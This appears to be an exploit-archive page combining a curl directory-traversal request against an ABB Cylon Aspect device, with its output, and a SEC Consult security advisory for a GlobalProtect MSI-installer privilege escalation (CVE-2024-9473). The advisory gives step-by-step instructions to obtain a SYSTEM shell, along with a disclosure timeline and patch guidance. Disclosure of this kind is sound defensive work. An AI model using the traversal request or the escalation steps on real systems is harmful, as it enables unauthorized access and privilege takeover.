                                                                                                  $ curl "http://192.168.73.31/persistenceManagerAjax.php" \> -d "command=justList\> &directory=./lib/" \> | sed -e 's/.*\[$.*$\].*/\1/' \> | tr -d '\' \> | sed '1,1d' \> | sed '$d'INI.phpJSON.phpaspect-status.inccaldav-checksums.inccheckForLineFeed.phpcheck_networking.phpcommands.incconfigParameter.phpdatetime_includes.incerrorCall.phpfileDownload.phpfileUpload.incformOptions.phpgetUrlStatus.phpinString.phpjsFunctions.phpmatrix-php.incobtainPorts.phpphpCheck.phpphpTimezone.php

ABB Cylon Aspect 3.08.01 persistenceManagerAjax.php Directory Traversal

Palo Alto Networks GlobalProtect versions 5.1.x, 5.2.x, 6.0.x, 6.1.x, 6.3.x and versions less than 6.2.5 suffer from a local privilege escalation vulnerability.

SEC Consult Vulnerability Lab Security Advisory < 20241009-0 >  
=======================================================================  
              title: Local Privilege Escalation via MSI installer  
            product: Palo Alto Networks GlobalProtect  
 vulnerable version: 5.1.x, 5.2.x, 6.0.x, 6.1.x, <6.2.5, 6.3.x  
      fixed version: >=6.2.5, all other versions are not patched yet  
         CVE number: CVE-2024-9473  
             impact: high  
           homepage: https://docs.paloaltonetworks.com/globalprotect  
              found: 2023-11-16  
                 by: Michael Baer (Office Fürth)  
                     SEC Consult Vulnerability Lab 

                     An integrated part of SEC Consult, an Eviden business  
                     Europe | Asia

                     https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"GlobalProtect enables you to use Palo Alto Networks next-gen firewalls or  
Prisma Access to secure your mobile workforce."

Source: https://docs.paloaltonetworks.com/globalprotect

Business recommendation:  
------------------------  
The vendor provides a patched version v6.2.5 which should be installed immediately.  
Further affected branches will be patched by the vendor in the future, except  
branch 5.2.x which is EOL. Users are urged to upgrade to the most recent versions.

SEC Consult highly recommends to perform a thorough security review of the  
product conducted by security professionals to identify and resolve potential  
further security issues.

Vulnerability overview/description:  
-----------------------------------  
1) Local Privilege Escalation via MSI installer (CVE-2024-9473)  
The configuration of the GlobalProtect MSI installer file was found to  
produce a visible conhost.exe window running as the SYSTEM user when using   
the repair function of msiexec.exe. This allows a local, low-privileged  
attacker to use a chain of actions, to open a fully functional cmd.exe  
with the privileges of the SYSTEM user. 

Proof of concept:  
-----------------  
1) Local Privilege Escalation via MSI installer (CVE-2024-9473)  
For the exploit to work, GlobalProtect has to be installed via the MSI file.  
Afterwards, any low-privileged user can start the repair of GlobalProtect by  
double-clicking the installer and trigger the vulnerable actions  
without a UAC popup. The installer, if deleted from it's original location,  
can be found in C:\Windows\Installer with a randomized name.

During the repair process, the subprocess PanVCrediChecker.exe gets  
called with SYSTEM privileges and performs a read action on the file   
"C:\Program Files\Palo Alto Networks\GlobalProtect\libeay32.dll".

This can be used by an attacker by simply setting an oplock on the file.  
As soon as it gets read, the process is blocked until the lock is released.  
To do that, one can use the 'SetOpLock.exe' tool from  
"https://github.com/googleprojectzero/symboliclink-testing-tools"  
with the following parameters:

SetOpLock.exe "C:\Program Files\Palo Alto Networks\GlobalProtect\libeay32.dll" x  
See figure 1 [lock.webp]

During the repair process, the locked file is accessed several times. The lock  
has to be released by pressing ENTER five times before the conhost.exe  
window opens. For the sixth request, the lock should not be released to keep the  
window open. The conhost window that gets opened when PanVcrediChecker.exe is  
executed doesn't close and can then be interacted with.

The attacker can then perform the following actions to   
spawn a SYSTEM shell:  
- Right click on the top bar of the window  
- Click on properties [ see figure 2 openbrowser.webp]  
- Under options, click on the "new console features" link [see figure 2  
    openbrowser.webp]  
- Open the link with e.g. firefox or chrome [see figure 2 openbrowser.webp]  
- In the opened browser window press the key combination CTRL+o  
- Type cmd.exe in the top bar and press Enter [see figure 3 cmd.webp]

Note that this does not work using a recent version of the Edge Browser.

Vulnerable / tested versions:  
-----------------------------  
The following versions have been tested which were the only versions  
available to SEC Consult at the time of the test. SEC Consult was not  
entirely sure, which exact version the product was:  
- ProductVersion as stated by the PropertyTable: 5.2.10  
- Version as stated by Windows after installing: 5.1.5  
- 6.1.2 is affected as well

The vendor confirmed that versions <6.2.5 are affected. Furthermore,  
all other branches 5.1.x, 5.2.x, 6.0.x, 6.1.x and 6.3.x are affected  
as well. Branch 5.2.x is end of life according to the vendor and will  
not be patched.

Vendor contact timeline:  
------------------------  
2023-11-17: Contacting vendor through PSIRT@PaloAltoNetworks.com  
            asking for most recent software version  
2023-11-21: Vendor confirms receipt of contact  
2023-11-23: Vendor denies providing most recent version and asks for  
            full technical report via their online form:  
            https://security.paloaltonetworks.com/report  
            Note: Submitting the advisory draft via online form  
            repeatedly results in server errors  
2023-11-23: Sending the advisory via PSIRT@PaloAltoNetworks.com  
2024-01-11: Contacting vendor through PSIRT@PaloAltoNetworks.com  
            asking for confirmation of receiving the advisory and  
            status of their triage.  
2024-01-12: Vendor confirms receiving the advisory.  
            The issue is tracked internally.  
2024-03-06: Contacting vendor through PSIRT@PaloAltoNetworks.com   
            asking for update of the vulnerability.  
2024-04-02: The vendor notifies that the product team is working  
            on the report.  
2024-04-08: Asking vendor to notify about updates and the timeline  
            of a fix.  
2024-04-24: Vendor was able to reproduce the issue, but not in the  
            most recent versions. 5.1.5 is affected, but not 5.2.10  
            nor 5.1.12, nor 6.2.2.  
2024-05-23: Asking vendor about affected/fixed versions and regarding  
            CVE number.  
2024-05-30: Vendor apologizes for version confusion, following up with team  
            internally. Vendor plans to publish an advisory with CVE, but  
            no date yet, asks us to wait/coordinate our advisory with theirs.  
2024-06-03: Answering that we will wait for their release & advisory.  
2024-06-17: Asking for a status update regarding the version numbers &  
            advisory release.  
            Vendor: no ETA/timeline yet, no version information.  
2024-09-25: Asking for a status update regarding the vendor advisory and for  
            confirmation of the available fixes.  
2024-09-27: Vendor investigated further and previous versions are unfortunately  
            affected as well. Product team works on a fix, advisory & CVE  
            release scheduled for 9th October 9 AM PT.  
2024-09-27: Acknowledging the coordinated advisory release for 9th October.  
2024-10-03: Vendor communicates further information regarding affected versions  
            and their advisory draft.  
2024-10-07: Vendor confirms 5.2.x as affected as well, but is EOL without fix.  
2024-10-09: Coordinated release of security advisory.

Solution:  
---------  
The vendor provides an updated version v6.2.5 which fixes the issues for this  
specific branch. Other versions are not yet patched and will be fixed in future  
releases.

Further information can be found at the vendor's website.  
https://security.paloaltonetworks.com

Users are urged to upgrade to the latest version and remove old versions  
of the MSI installer, especially users of v5.2.x as this branch is EOL and won't  
receive an update.

SEC Consult has also released a blog post on 12th September 2024 regarding MSI  
installer security issues tracked as CVE-2024-38014 and a general fix by  
Microsoft. We have contacted Microsoft to have a more general solution for  
every affected vendor. For further details check out the blog post:  
https://r.sec-consult.com/msi

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab   
An integrated part of SEC Consult, an Eviden business  
Europe | Asia

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Eviden business. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: https://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF Michael Baer, Johannes Greil / 2024